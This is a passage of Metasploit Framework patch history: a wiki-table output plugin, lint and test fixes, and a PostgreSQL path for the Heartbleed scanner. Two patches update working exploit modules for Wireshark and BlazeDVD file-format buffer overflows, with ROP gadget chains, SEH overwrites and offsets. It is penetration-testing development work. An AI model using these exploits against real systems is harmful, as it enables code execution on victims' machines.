command.downcase + usage(wiki_type) + return + end + + # Parse the rest of the arguments + while (arg = args.shift) + case arg + when '-o','--output' + tbl_opts[:file_name] = next_opt(args) + when '-h','--help' + usage(wiki_type) + return + when '-l', '-L', '--link', '--links' + tbl_opts[:links] = true + when '-n', '-N', '--namespace' + tbl_opts[:namespace] = next_opt(args) + when '-p', '-P', '--port', '--ports' + tbl_opts[:ports] = next_opts(args) + tbl_opts[:ports].map! {|p| p.to_i} + when '-s', '-S', '--search' + tbl_opts[:search] = next_opt(args) + when '-i', '-I', '--heading-size' + heading_size = next_opt(args) + tbl_opts[:heading_size] = heading_size.to_i unless heading_size.nil? + else + # Assume it is a host + rw = Rex::Socket::RangeWalker.new(arg) + if rw.valid? + rw.each do |ip| + tbl_opts[:hosts] << ip + end + else + print_warning "#{arg} is an invalid hostname" + end + end + end + + # Create an Array to hold a list of tables that we want to show + outputs = [] + + # Output the table + if respond_to? "#{command}_to_table" + table = send "#{command}_to_table", tbl_opts + if table.respond_to? "to_#{wiki_type}" + if tbl_opts[:file_name] + print_status("Wrote the #{command} table to a file as a #{wiki_type} formatted table") + File.open(tbl_opts[:file_name],"wb") {|f| + f.write(table.send "to_#{wiki_type}") + } + else + print_line table.send "to_#{wiki_type}" + end + return + end + end + usage(wiki_type) + end + + # + # Gets the next set of arguments when parsing command options + # + # *Note:* This will modify the provided argument list + # + # @param [Array] args the list of unparsed arguments + # @return [Array] the unique list of items before the next '-' in the + # provided array + # + def next_opts(args) + opts = [] + while ( opt = args.shift ) + if opt =~ /^-/ + args.unshift opt + break + end + opts.concat ( opt.split(',') ) + end + return opts.uniq + end + + # + # Gets the next argument when parsing command options + # + # *Note:* This will modify the provided argument list + # + # @param [Array] args the list of unparsed arguments + # @return [String, nil] the argument or nil if the argument starts with a '-' + # + def next_opt(args) + return nil if args[0] =~ /^-/ + args.shift + end + + # + # Outputs the help message + # + # @param [String] cmd_name the type of the wiki output command to display + # help for + # + def usage(cmd_name = "") + print_line "Usage: #{cmd_name} [options] [IP1 IP2,IPn]" + print_line + print_line "The first argument must be the type of table to retrieve:" + print_line " creds, hosts, loot, services, vulns" + print_line + print_line "OPTIONS:" + print_line " -l,--link Enables links for host addresses" + print_line " -n,--namespace Changes the default namespace for host links" + print_line " -o,--output Write output to a file" + print_line " -p,--port Only return results that relate to given ports" + print_line " -s,--search Only show results that match the provided text" + print_line " -i,--heading-size <1-6> Changes the heading size" + print_line " -h,--help Displays this menu" + print_line + end + + # + # Outputs credentials in the database (within the current workspace) as a Rex table object + # @param [Hash] opts + # @option opts [Array] :hosts contains list of hosts used to limit results + # @option opts [Array] :ports contains list of ports used to limit results + # @option opts [String] :search limits results to those containing a provided string + # @return [Rex::Ui::Text::Table] table containing credentials + # + def creds_to_table(opts = {}) + tbl = Rex::Ui::Text::Table.new({'Columns' => ['host','port','user','pass','type','proof','active?']}) + tbl.header = 'Credentials' + tbl.headeri = opts[:heading_size] + framework.db.creds.each do |cred| + unless opts[:hosts].nil? or opts[:hosts].empty? + next unless opts[:hosts].include? cred.service.host.address + end + unless opts[:ports].nil? + next unless opts[:ports].any? {|p| cred.service.port.eql? p} + end + address = cred.service.host.address + address = to_wikilink(address,opts[:namespace]) if opts[:links] + row = [ + address, + cred.service.port, + cred.user, + cred.pass, + cred.ptype, + cred.proof, + cred.active + ] + if opts[:search] + tbl << row if row.any? {|r| /#{opts[:search]}/i.match r.to_s} + else + tbl << row + end + end + return tbl + end + + # + # Outputs host information stored in the database (within the current + # workspace) as a Rex table object + # @param [Hash] opts + # @option opts [Array] :hosts contains list of hosts used to limit results + # @option opts [Array] :ports contains list of ports used to limit results + # @option opts [String] :search limits results to those containing a provided string + # @return [Rex::Ui::Text::Table] table containing credentials + # + def hosts_to_table(opts = {}) + tbl = Rex::Ui::Text::Table.new({'Columns' => ['address','mac','name','os_name','os_flavor','os_sp','purpose','info','comments']}) + tbl.header = 'Hosts' + tbl.headeri = opts[:heading_size] + framework.db.hosts.each do |host| + unless opts[:hosts].nil? or opts[:hosts].empty? + next unless opts[:hosts].include? host.address + end + unless opts[:ports].nil? + next unless (host.services.map{|s| s[:port]}).any? {|p| opts[:ports].include? p} + end + address = host.address + address = to_wikilink(address,opts[:namespace]) if opts[:links] + row = [ + address, + host.mac, + host.name, + host.os_name, + host.os_flavor, + host.os_sp, + host.purpose, + host.info, + host.comments + ] + if opts[:search] + tbl << row if row.any? {|r| /#{opts[:search]}/i.match r.to_s} + else + tbl << row + end + end + return tbl + end + + # + # Outputs loot information stored in the database (within the current + # workspace) as a Rex table object + # @param [Hash] opts + # @option opts [Array] :hosts contains list of hosts used to limit results + # @option opts [Array] :ports contains list of ports used to limit results + # @option opts [String] :search limits results to those containing a provided string + # @return [Rex::Ui::Text::Table] table containing credentials + # + def loot_to_table(opts = {}) + tbl = Rex::Ui::Text::Table.new({'Columns' => ['host','service','type','name','content','info','path']}) + tbl.header = 'Loot' + tbl.headeri = opts[:heading_size] + framework.db.loots.each do |loot| + unless opts[:hosts].nil? or opts[:hosts].empty? + next unless opts[:hosts].include? loot.host.address + end + unless opts[:ports].nil? or opts[:ports].empty? + next if loot.service.nil? or loot.service.port.nil? or not opts[:ports].include? loot.service.port + end + if loot.service + svc = (loot.service.name ? loot.service.name : "#{loot.service.port}/#{loot.service.proto}") + end + address = loot.host.address + address = to_wikilink(address,opts[:namespace]) if opts[:links] + row = [ + address, + svc || "", + loot.ltype, + loot.name, + loot.content_type, + loot.info, + loot.path + ] + if opts[:search] + tbl << row if row.any? {|r| /#{opts[:search]}/i.match r.to_s} + else + tbl << row + end + end + return tbl + end + + # + # Outputs service information stored in the database (within the current + # workspace) as a Rex table object + # @param [Hash] opts + # @option opts [Array] :hosts contains list of hosts used to limit results + # @option opts [Array] :ports contains list of ports used to limit results + # @option opts [String] :search limits results to those containing a provided string + # @return [Rex::Ui::Text::Table] table containing credentials + # + def services_to_table(opts = {}) + tbl = Rex::Ui::Text::Table.new({'Columns' => ['host','port','proto','name','state','info']}) + tbl.header = 'Services' + tbl.headeri = opts[:heading_size] + framework.db.services.each do |service| + unless opts[:hosts].nil? or opts[:hosts].empty? + next unless opts[:hosts].include? service.host.address + end + unless opts[:ports].nil? or opts[:ports].empty? + next unless opts[:ports].any? {|p| service[:port].eql? p} + end + address = service.host.address + address = to_wikilink(address,opts[:namespace]) if opts[:links] + row = [ + address, + service.port, + service.proto, + service.name, + service.state, + service.info + ] + if opts[:search] + tbl << row if row.any? {|r| /#{opts[:search]}/i.match r.to_s} + else + tbl << row + end + end + return tbl + end + + # + # Outputs vulnerability information stored in the database (within the current + # workspace) as a Rex table object + # @param [Hash] opts + # @option opts [Array] :hosts contains list of hosts used to limit results + # @option opts [Array] :ports contains list of ports used to limit results + # @option opts [String] :search limits results to those containing a provided string + # @return [Rex::Ui::Text::Table] table containing credentials + # + def vulns_to_table(opts = {}) + tbl = Rex::Ui::Text::Table.new({'Columns' => ['Title','Host','Port','Info','Detail Count','Attempt Count','Exploited At','Updated At']}) + tbl.header = 'Vulns' + tbl.headeri = opts[:heading_size] + framework.db.vulns.each do |vuln| + unless opts[:hosts].nil? or opts[:hosts].empty? + next unless opts[:hosts].include? vuln.host.address + end + unless opts[:ports].nil? or opts[:ports].empty? + next unless opts[:ports].any? {|p| vuln.service.port.eql? p} + end + address = vuln.host.address + address = to_wikilink(address,opts[:namespace]) if opts[:links] + row = [ + vuln.name, + address, + (vuln.service ? vuln.service.port : ""), + vuln.info, + vuln.vuln_detail_count, + vuln.vuln_attempt_count, + vuln.exploited_at, + vuln.updated_at, + ] + if opts[:search] + tbl << row if row.any? {|r| /#{opts[:search]}/i.match r.to_s} + else + tbl << row + end + end + return tbl + end + + # + # Converts a value to a wiki link + # @param [String] text value to convert to a link + # @param [String] namespace optional namespace to set for the link + # @return [String] the formated wiki link + def to_wikilink(text,namespace = "") + return "[[" + namespace + text + "]]" + end + + end + + + # + # Plugin Initialization + # + + + # + # Constructs a new instance of the plugin and registers the console + # dispatcher. It also extends Rex by adding the following methods: + # * Rex::Ui::Text::Table.to_dokuwiki + # * Rex::Ui::Text::Table.to_mediawiki + # * Rex:Text.prevent_xss + # + def initialize(framework, opts) + super + + # Extend Rex::Ui::Text::Table class so it can output wiki formats + add_dokuwiki_to_rex + add_mediawiki_to_rex + + # Add the console dispatcher + add_console_dispatcher(WikiCommandDispatcher) + end + + # + # The cleanup routine removes the methods added to Rex by the plugin + # initialization and then removes the console dispatcher + # + def cleanup + # Cleanup methods added to Rex::Ui::Text::Table + Rex::Ui::Text::Table.class_eval { undef :to_dokuwiki } + Rex::Ui::Text::Table.class_eval { undef :to_mediawiki } + # Deregister the console dispatcher + remove_console_dispatcher('Wiki') + end + + # + # Returns the plugin's name. + # + def name + "wiki" + end + + # + # This method returns a brief description of the plugin. It should be no + # more than 60 characters, but there are no hard limits. + # + def desc + "Adds output to wikitext" + end + + + # + # The following methods are added here to keep the initialize method + # readable + # + + + # + # Extends Rex tables to be able to create Dokuwiki tables + # + def add_dokuwiki_to_rex + Rex::Ui::Text::Table.class_eval do + def to_dokuwiki + str = prefix.dup + # Print the header if there is one. Use headeri to determine wiki paragraph level + if header + level = "=" * headeri + str << level + header + level + "\n" + end + # Add the column names to the top of the table + columns.each do |col| + str << "^ " + col.to_s + " " + end + str << "^\n" unless columns.count.eql? 0 + # Fill out the rest of the table with rows + rows.each do |row| + row.each do |val| + cell = val.to_s + cell = "#{cell}" if cell.include? "|" + str << "| " + cell + " " + end + str << "|\n" unless rows.count.eql? 0 + end + return str + end + end + end + + # + # Extends Rex tables to be able to create Mediawiki tables + # + def add_mediawiki_to_rex + Rex::Ui::Text::Table.class_eval do + def to_mediawiki + str = prefix.dup + # Print the header if there is one. Use headeri to determine wiki + # headline level. Mediawiki does headlines a bit backwards so that + # the header level isn't limited. This results in the need to 'flip' + # the headline length to standardize it. + if header + if headeri <= 6 + level = "=" * (-headeri + 7) + str << "#{level} #{header} #{level}" + else + str << "#{header}" + end + str << "\n" + end + # Setup the table with some standard formatting options + str << "{|class=\"wikitable\"\n" + # Output formated column names as the first row + unless columns.count.eql? 0 + str << "!" + str << columns.join("!!") + str << "\n" + end + # Add the rows to the table + unless rows.count.eql? 0 + rows.each do |row| + str << "|-\n|" + # Try and prevent formatting tags from causing problems + bad = ['&','<','>','"',"'",'/'] + r = row.join("|| ") + r.each_char do |c| + if bad.include? c + str << Rex::Text.html_encode(c) + else + str << c + end + end + str << "\n" + end + end + # Finish up the table + str << "|}" + return str + end + end + end + +protected +end +end From b864c4619db26fc294b83676bddd0635325974a3 Mon Sep 17 00:00:00 2001 From: Christian Mehlmauer Date: Mon, 21 Apr 2014 18:04:14 +0200 Subject: [PATCH 133/853] msftidy - added info messages this commit adds info messages to msftidy to show some info, but stil exit with status 0 if there are not errors. --- tools/msftidy.rb | 17 ++++++++++++++--- 1 file changed, 14 insertions(+), 3 deletions(-) diff --git a/tools/msftidy.rb b/tools/msftidy.rb index b263d16f61..9c6f299c11 100755 --- a/tools/msftidy.rb +++ b/tools/msftidy.rb @@ -30,6 +30,10 @@ class String "\e[1;32;40m#{self}\e[0m" end + def cyan + "\e[1;36;40m#{self}\e[0m" + end + def ascii_only? self =~ Regexp.new('[\x00-\x08\x0b\x0c\x0e-\x19\x7f-\xff]', nil, 'n') ? false : true end @@ -83,6 +87,13 @@ class Msftidy puts "#{@full_filepath}#{line_msg} - [#{'FIXED'.green}] #{cleanup_text(txt)}" end + # + # Display an info message. Info messages do not alter the exit status. + # + def info(txt, line=0) + line_msg = (line>0) ? ":#{line}" : '' + puts "#{@full_filepath}#{line_msg} - [#{'INFO'.cyan}] #{cleanup_text(txt)}" + end ## # @@ -490,10 +501,10 @@ class Msftidy test.each { |item| case item[1] when 'cgi' - warn("Please use vars_get in send_request_cgi: #{item[0]}") + info("Please use vars_get in send_request_cgi: #{item[0]}") when 'raw' - # send_request_raw does not support vars_getiirb - warn("Please use vars_get and switch to send_request_cgi: #{item[0]}") + # send_request_raw does not support vars_get + info("Please use vars_get and switch to send_request_cgi: #{item[0]}") else raise('Error in regex') end From e25ca6464161b735f2dc699ded9f6dcad4ef3464 Mon Sep 17 00:00:00 2001 From: JoseMi Date: Mon, 21 Apr 2014 17:49:40 +0100 Subject: [PATCH 134/853] It's solved the crash when double-click on the pcap file --- .../windows/misc/wireshark_mpeg_overflow.rb | 31 +++++++++++++------ 1 file changed, 22 insertions(+), 9 deletions(-) diff --git a/modules/exploits/windows/misc/wireshark_mpeg_overflow.rb b/modules/exploits/windows/misc/wireshark_mpeg_overflow.rb index 3002bfe3e7..934449dbb8 100644 --- a/modules/exploits/windows/misc/wireshark_mpeg_overflow.rb +++ b/modules/exploits/windows/misc/wireshark_mpeg_overflow.rb @@ -47,7 +47,8 @@ class Metasploit3 < Msf::Exploit::Remote [ [ 'WinXP SP3 Spanish (bypass DEP)', { - 'OffSet' => 70692, + 'OffSet' => 69732, + 'OffSet2' => 70476, 'Ret' => 0x1c077cc3, # pop/pop/ret -> "c:\Program Files\Wireshark\krb5_32.dll" (version: 1.6.3.16) 'jmpesp' => 0x68e2bfb9, } @@ -94,18 +95,30 @@ class Metasploit3 < Msf::Exploit::Remote def exploit print_status("Creating '#{datastore['FILENAME']}' file ...") - magic_header = "\xff\xfb\x41" # mpeg magic_number(MP3) -> http://en.wikipedia.org/wiki/MP3#File_structure - packet = rand_text_alpha(891) + ropchain = create_rop_chain + magic_header = "\xff\xfb\x41" # mpeg magic_number(MP3) -> http://en.wikipedia.org/wiki/MP3#File_structure + # Here we build the packet data + packet = rand_text_alpha(883) + packet << "\x6c\x7d\x37\x6c" # NOP RETN + packet << "\x6c\x7d\x37\x6c" # NOP RETN packet << ropchain - packet << payload.encoded # Shellcode + packet << payload.encoded # Shellcode packet << rand_text_alpha(target['OffSet'] - 892 - ropchain.length - payload.encoded.length) - # SEH pointers overwrite (nseh & seh) - packet << make_nops(4) # nseh - # \0xff is a badchar then we can't make a jump back with jmp $-2000 + + # 0xff is a badchar for this exploit then we can't make a jump back with jmp $-2000 # After nseh and seh we haven't space, then we have to jump to another location. - # 0x6b805955 : # ADD ESP,86C # POP EBX # POP ESI # POP EDI # POP EBP # RETN ** [libjpeg-8.dll] ** | {PAGE_EXECUTE_REA - packet << "\x55\x59\x80\x6b" # seh -> ADD ESP,offset # RETN + + # When file is open with command line. This is NSEH/SEH overwrite + packet << make_nops(4) # nseh + packet << "\x6c\x2e\xe0\x68" # ADD ESP,93C # MOV EAX,EBX # POP EBX # POP ESI # POP EDI # POP EBP # RETN + + packet << rand_text_alpha(target['OffSet2'] - target['OffSet'] - 8) # junk + + # When file is open with GUI interface. This is NSEH/SEH overwrite + packet << make_nops(4) # nseh + packet << "\x55\x59\x80\x6b" # seh -> # ADD ESP,86C # POP EBX # POP ESI # POP EDI # POP EBP # RETN ** [libjpeg-8.dll] ** + print_status("Preparing payload") filecontent = magic_header filecontent << packet From c56182a9781b70dc24880e2ba98e863447fb6c75 Mon Sep 17 00:00:00 2001 From: Trenton Ivey Date: Mon, 21 Apr 2014 12:26:28 -0500 Subject: [PATCH 135/853] Removed an old comment about an added method. Data validation for each wiki type is attempted inline instead of through Rex --- plugins/wiki.rb | 1 - 1 file changed, 1 deletion(-) diff --git a/plugins/wiki.rb b/plugins/wiki.rb index 9e8d31f5af..6128eb200d 100644 --- a/plugins/wiki.rb +++ b/plugins/wiki.rb @@ -440,7 +440,6 @@ class Plugin::Wiki < Msf::Plugin # dispatcher. It also extends Rex by adding the following methods: # * Rex::Ui::Text::Table.to_dokuwiki # * Rex::Ui::Text::Table.to_mediawiki - # * Rex:Text.prevent_xss # def initialize(framework, opts) super From 66b1c79da96277472e201e08b5eddf084d5d6895 Mon Sep 17 00:00:00 2001 From: Ken Smith Date: Mon, 21 Apr 2014 13:27:14 -0400 Subject: [PATCH 136/853] Update rop chain for versions 6.2 and 6.1 --- .../windows/fileformat/blazedvd_plf.rb | 47 ++++++++++--------- 1 file changed, 24 insertions(+), 23 deletions(-) diff --git a/modules/exploits/windows/fileformat/blazedvd_plf.rb b/modules/exploits/windows/fileformat/blazedvd_plf.rb index 665188f30f..b97afc1567 100644 --- a/modules/exploits/windows/fileformat/blazedvd_plf.rb +++ b/modules/exploits/windows/fileformat/blazedvd_plf.rb @@ -14,17 +14,17 @@ class Metasploit3 < Msf::Exploit::Remote super(update_info(info, 'Name' => 'BlazeDVD 6.1 PLF Buffer Overflow', 'Description' => %q{ - This module exploits a stack over flow in BlazeDVD 5.1 and 6.1. When + This module exploits a stack over flow in BlazeDVD 5.1 and 6.2. When the application is used to open a specially crafted plf file, a buffer is overwritten allowing for the execution of arbitrary code. }, 'License' => MSF_LICENSE, 'Author' => [ - 'MC', - 'Deepak Rathore', - 'Spencer McIntyre', - 'Ken Smith' + 'MC', # Developed target 5.1 + 'Deepak Rathore', # ExploitDB PoC + 'Spencer McIntyre', # Developed taget 6.2 + 'Ken Smith' # Developed target 6.2 ], 'References' => [ @@ -46,7 +46,7 @@ class Metasploit3 < Msf::Exploit::Remote 'Platform' => 'win', 'Targets' => [ - [ 'BlazeDVD 6.1', + [ 'BlazeDVD 6.2', { 'Payload' => { @@ -78,31 +78,32 @@ class Metasploit3 < Msf::Exploit::Remote def rop_chain # rop chain generated with mona.py - www.corelan.be case target.name - when 'BlazeDVD 6.1' + when 'BlazeDVD 6.2' rop_gadgets = [ ] # 0x6162e802 RETN (ROP NOP) [EPG.dll] rop_gadgets.fill(0x6162e802, 0..7) rop_gadgets += [ - 0x6411437d, # POP EAX # RETN [NetReg.dll] + 0x61636758, # POP EAX # RETN [EPG.dll] 0x10011108, # ptr to &VirtualProtect() [IAT SkinScrollBar.Dll] - 0x6033d910, # MOV ESI,DWORD PTR DS:[EAX] # RETN [Configuration.dll] - 0x640402b3, # POP EBP # RETN [MediaPlayerCtrl.dll] - 0x60335935, # & PUSH ESP # RETN 0C [Configuration.dll] - 0x6032b8bb, # POP EAX # RETN [Configuration.dll] - 0xfffffcff, # Value to negate, will become 0x00000301 + 0x616306ed, # MOV EAX,DWORD PTR DS:[EAX] # RETN [EPG.dll] + 0x616385d8, # XCHG EAX,ESI # RETN 0x00 [EPG.dll] + 0x61628ea2, # POP EBP # RETN [EPG.dll] + 0x616069a1, # push esp # ret 0x04 [EPG.dll] + 0x61626702, # POP EAX # RETN [EPG.dll] + 0xfffffdff, # Value to negate, will become 0x00000201 0x61627d9c, # NEG EAX # RETN [EPG.dll] 0x61640124, # XCHG EAX,EBX # RETN [EPG.dll] - 0x6403bb48, # POP EAX # RETN [MediaPlayerCtrl.dll] + 0x61629938, # POP EAX # RETN [EPG.dll] 0xffffffc0, # Value to negate, will become 0x00000040 - 0x6403a1b7, # NEG EAX # RETN [MediaPlayerCtrl.dll] - 0x64046c72, # XCHG EAX,EDX # RETN [MediaPlayerCtrl.dll] - 0x6403c973, # POP ECX # RETN [MediaPlayerCtrl.dll] - 0x1001514c, # &Writable location [SkinScrollBar.Dll] - 0x6403a94d, # POP EDI # RETN [MediaPlayerCtrl.dll] - 0x6162e802, # RETN (ROP NOP) [EPG.dll] - 0x64106f33, # POP EAX # RETN [NetReg.dll] + 0x61627d9c, # NEG EAX # RETN [EPG.dll] + 0x61608ba2, # XCHG EAX,EDX # RETN [EPG.dll] + 0x61612f5a, # POP ECX # RETN [EPG.dll] + 0x100142ab, # &Writable location [SkinScrollBar.Dll] + 0x616313ac, # POP EDI # RETN [EPG.dll] + 0x6162e588, # RETN (ROP NOP) [EPG.dll] + 0x6162d638, # POP EAX # RETN [EPG.dll] 0x90909090, # nop - 0x6031d582, # PUSHAD # RETN [Configuration.dll] + 0x61620831, # PUSHAD # RETN [EPG.dll] ] end return rop_gadgets.flatten.pack("V*") @@ -115,7 +116,7 @@ class Metasploit3 < Msf::Exploit::Remote plf[868,8] = Rex::Arch::X86.jmp_short(6) + rand_text_alpha_upper(2) + [target.ret].pack('V') plf[876,12] = make_nops(12) plf[888,payload.encoded.length] = payload.encoded - when 'BlazeDVD 6.1' + when 'BlazeDVD 6.2' plf = rand_text_alphanumeric(260) plf << rop_chain plf << payload.encoded From fbe392a896d26940bfa9d81430bf83faacaa06bb Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Wies=C5=82aw=20Kielas?= Date: Mon, 21 Apr 2014 23:27:40 +0200 Subject: [PATCH 137/853] Add PostgreSQL TLS support to the Heartbleed scanner --- .../scanner/ssl/openssl_heartbleed.rb | 19 ++++++++++++++++--- 1 file changed, 16 insertions(+), 3 deletions(-) diff --git a/modules/auxiliary/scanner/ssl/openssl_heartbleed.rb b/modules/auxiliary/scanner/ssl/openssl_heartbleed.rb index 478ac0e3e6..bee8d53b86 100644 --- a/modules/auxiliary/scanner/ssl/openssl_heartbleed.rb +++ b/modules/auxiliary/scanner/ssl/openssl_heartbleed.rb @@ -80,7 +80,8 @@ class Metasploit3 < Msf::Auxiliary 'IMAP' => :tls_imap, 'JABBER' => :tls_jabber, 'POP3' => :tls_pop3, - 'FTP' => :tls_ftp + 'FTP' => :tls_ftp, + 'POSTGRES' => :tls_postgres } # See the discussion at https://github.com/rapid7/metasploit-framework/pull/3252 @@ -111,7 +112,8 @@ class Metasploit3 < Msf::Auxiliary 'Sebastiano Di Paola', # Msf module 'Tom Sellers', # Msf module 'jjarmoc', #Msf module; keydump, refactoring.. - 'Ben Buchanan' #Msf module + 'Ben Buchanan', #Msf module + 'herself' #Msf module ], 'References' => [ @@ -137,7 +139,7 @@ class Metasploit3 < Msf::Auxiliary register_options( [ Opt::RPORT(443), - OptEnum.new('TLS_CALLBACK', [true, 'Protocol to use, "None" to use raw TLS sockets', 'None', [ 'None', 'SMTP', 'IMAP', 'JABBER', 'POP3', 'FTP' ]]), + OptEnum.new('TLS_CALLBACK', [true, 'Protocol to use, "None" to use raw TLS sockets', 'None', [ 'None', 'SMTP', 'IMAP', 'JABBER', 'POP3', 'FTP', 'POSTGRES' ]]), OptEnum.new('TLS_VERSION', [true, 'TLS/SSL version to use', '1.0', ['SSLv3','1.0', '1.1', '1.2']]), OptInt.new('MAX_KEYTRIES', [true, 'Max tries to dump key', 10]), OptInt.new('STATUS_EVERY', [true, 'How many retries until status', 5]), @@ -222,6 +224,17 @@ class Metasploit3 < Msf::Auxiliary sock.get_once(-1, response_timeout) end + def tls_postgres + # http://www.postgresql.org/docs/9.3/static/protocol-message-formats.html + sock.get_once + sock.put("\x00\x00\x00\x08\x04\xD2\x16\x2F") + res = sock.get_once + unless res && res =~ /S/ + return nil + end + res + end + def tls_pop3 # http://tools.ietf.org/html/rfc2595 sock.get_once(-1, response_timeout) From f35314b9f005d9b73ab024a5063ae11f486aa884 Mon Sep 17 00:00:00 2001 From: "Rick Farina (Zero_Chaos)" Date: Mon, 21 Apr 2014 21:56:56 -0400 Subject: [PATCH 138/853] adjust Msf::Util::EXE for newer file output Newer releases of File have a much different output when given a jar file. Adjust regex per egyp7's suggestion to close bug 8792 on redmine. Failure/Error: verify_bin_fingerprint(format_hash, bin) expected: /zip/i got: "/dev/stdin: Java archive data (JAR)\n" (using =~) Tested and confirmed working with file 5.17 on Gentoo Linux. --- spec/support/shared/contexts/msf/util/exe.rb | 26 ++++++++++---------- 1 file changed, 13 insertions(+), 13 deletions(-) diff --git a/spec/support/shared/contexts/msf/util/exe.rb b/spec/support/shared/contexts/msf/util/exe.rb index e1372a6492..c1b6ea5a92 100644 --- a/spec/support/shared/contexts/msf/util/exe.rb +++ b/spec/support/shared/contexts/msf/util/exe.rb @@ -36,8 +36,8 @@ shared_context 'Msf::Util::Exe' do { :format => "psh", :arch => "x86_64", :file_fp => /ASCII/ }, { :format => "psh-net", :arch => "x86", :file_fp => /ASCII/ }, { :format => "psh-net", :arch => "x86_64", :file_fp => /ASCII/ }, - { :format => "war", :arch => "x86", :file_fp => /zip/i }, - { :format => "war", :arch => "x86_64", :file_fp => /zip/i }, + { :format => "war", :arch => "x86", :file_fp => /zip|jar/i }, + { :format => "war", :arch => "x86_64", :file_fp => /zip|jar/i }, { :format => "msi", :arch => "x86", :file_fp => /(Composite Document)|(CDF V2 Document)/ }, { :format => "msi", :arch => "x64", :file_fp => /(Composite Document)|(CDF V2 Document)/ }, { :format => "msi", :arch => "x86_64", :file_fp => /(Composite Document)|(CDF V2 Document)/ }, @@ -51,29 +51,29 @@ shared_context 'Msf::Util::Exe' do { :format => "elf", :arch => "armle", :file_fp => /ELF 32.*ARM/ }, { :format => "elf", :arch => "mipsbe", :file_fp => /ELF 32-bit MSB executable, MIPS/ }, { :format => "elf", :arch => "mipsle", :file_fp => /ELF 32-bit LSB executable, MIPS/ }, - { :format => "war", :arch => "x86", :file_fp => /zip/i }, - { :format => "war", :arch => "x64", :file_fp => /zip/i }, - { :format => "war", :arch => "armle", :file_fp => /zip/i }, - { :format => "war", :arch => "mipsbe", :file_fp => /zip/i }, - { :format => "war", :arch => "mipsle", :file_fp => /zip/i }, + { :format => "war", :arch => "x86", :file_fp => /zip|jar/i }, + { :format => "war", :arch => "x64", :file_fp => /zip|jar/i }, + { :format => "war", :arch => "armle", :file_fp => /zip|jar/i }, + { :format => "war", :arch => "mipsbe", :file_fp => /zip|jar/i }, + { :format => "war", :arch => "mipsle", :file_fp => /zip|jar/i }, ], "bsd" => [ { :format => "elf", :arch => "x86", :file_fp => /ELF 32.*BSD/ }, - { :format => "war", :arch => "x86", :file_fp => /zip/i }, + { :format => "war", :arch => "x86", :file_fp => /zip|jar/i }, ], "solaris" => [ { :format => "elf", :arch => "x86", :file_fp => /ELF 32/ }, - { :format => "war", :arch => "x86", :file_fp => /zip/i }, + { :format => "war", :arch => "x86", :file_fp => /zip|jar/i }, ], "osx" => [ { :format => "macho", :arch => "x86", :file_fp => /Mach-O.*i386/ }, { :format => "macho", :arch => "x64", :file_fp => /Mach-O 64/ }, { :format => "macho", :arch => "armle", :file_fp => /Mach-O.*(acorn|arm)/ }, { :format => "macho", :arch => "ppc", :file_fp => /Mach-O.*ppc/ }, - { :format => "war", :arch => "x86", :file_fp => /zip/i }, - { :format => "war", :arch => "x64", :file_fp => /zip/i }, - { :format => "war", :arch => "armle", :file_fp => /zip/i }, - { :format => "war", :arch => "ppc", :file_fp => /zip/i }, + { :format => "war", :arch => "x86", :file_fp => /zip|jar/i }, + { :format => "war", :arch => "x64", :file_fp => /zip|jar/i }, + { :format => "war", :arch => "armle", :file_fp => /zip|jar/i }, + { :format => "war", :arch => "ppc", :file_fp => /zip|jar/i }, ], } From 8f6567967db18edbd13584b165c4b058c0c38ff8 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Wies=C5=82aw=20Kielas?= Date: Tue, 22 Apr 2014 17:36:06 +0200 Subject: [PATCH 139/853] Heartbleed PostgreSQL TLS support improvements --- modules/auxiliary/scanner/ssl/openssl_heartbleed.rb | 7 ++++++- 1 file changed, 6 insertions(+), 1 deletion(-) diff --git a/modules/auxiliary/scanner/ssl/openssl_heartbleed.rb b/modules/auxiliary/scanner/ssl/openssl_heartbleed.rb index bee8d53b86..3cca563d4b 100644 --- a/modules/auxiliary/scanner/ssl/openssl_heartbleed.rb +++ b/modules/auxiliary/scanner/ssl/openssl_heartbleed.rb @@ -225,9 +225,14 @@ class Metasploit3 < Msf::Auxiliary end def tls_postgres + # postgresql TLS - works with all modern pgsql versions - 8.0 - 9.3 # http://www.postgresql.org/docs/9.3/static/protocol-message-formats.html sock.get_once - sock.put("\x00\x00\x00\x08\x04\xD2\x16\x2F") + # the postgres SSLRequest packet is a int32(8) followed by a int16(1234), + # int16(5679) in network format + psql_sslrequest = [8].pack('N') + psql_sslrequest << [1234, 5679].pack('n*') + sock.put(psql_sslrequest) res = sock.get_once unless res && res =~ /S/ return nil From 3f4e9ab18d13a7a079cd75c6e5eeaa6cbb6a2a27 Mon Sep 17 00:00:00 2001 From: Christian Mehlmauer Date: Tue, 22 Apr 2014 19:24:06 +0200 Subject: [PATCH 140/853] msftidy: only check send_request_cgi for vars_get --- tools/msftidy.rb | 12 ++---------- 1 file changed, 2 insertions(+), 10 deletions(-) diff --git a/tools/msftidy.rb b/tools/msftidy.rb index 9c6f299c11..ae7072ff77 100755 --- a/tools/msftidy.rb +++ b/tools/msftidy.rb @@ -496,18 +496,10 @@ class Msftidy end def check_vars_get - test = @source.scan(/(send_request_(cgi|raw)\s*\(\s*\{?\s*['"]uri['"]\s*=>\s*[^=})]*?\?[^,})]+)/im) + test = @source.scan(/send_request_cgi\s*\(\s*\{?\s*['"]uri['"]\s*=>\s*[^=})]*?\?[^,})]+/im) unless test.empty? test.each { |item| - case item[1] - when 'cgi' - info("Please use vars_get in send_request_cgi: #{item[0]}") - when 'raw' - # send_request_raw does not support vars_get - info("Please use vars_get and switch to send_request_cgi: #{item[0]}") - else - raise('Error in regex') - end + info("Please use vars_get in send_request_cgi: #{item}") } end end From d2a558dc85cd1ac4af87f9a12ca2c118e21f0edf Mon Sep 17 00:00:00 2001 From: kenkeiras Date: Tue, 22 Apr 2014 22:14:57 +0200 Subject: [PATCH 141/853] Removed unused code --- modules/auxiliary/scanner/ssh/ssh_enumusers.rb | 2 -- 1 file changed, 2 deletions(-) diff --git a/modules/auxiliary/scanner/ssh/ssh_enumusers.rb b/modules/auxiliary/scanner/ssh/ssh_enumusers.rb index 306b98b707..09e625e9f6 100644 --- a/modules/auxiliary/scanner/ssh/ssh_enumusers.rb +++ b/modules/auxiliary/scanner/ssh/ssh_enumusers.rb @@ -152,11 +152,9 @@ class Metasploit3 < Msf::Auxiliary when :success print_good "User '#{user}' found on #{ip}" do_report(ip, user, rport) - :next_user when :connection_error print_error "User '#{user}' on #{ip} could not connect" - :abort when :fail print_debug "User '#{user}' not found on #{ip}" From 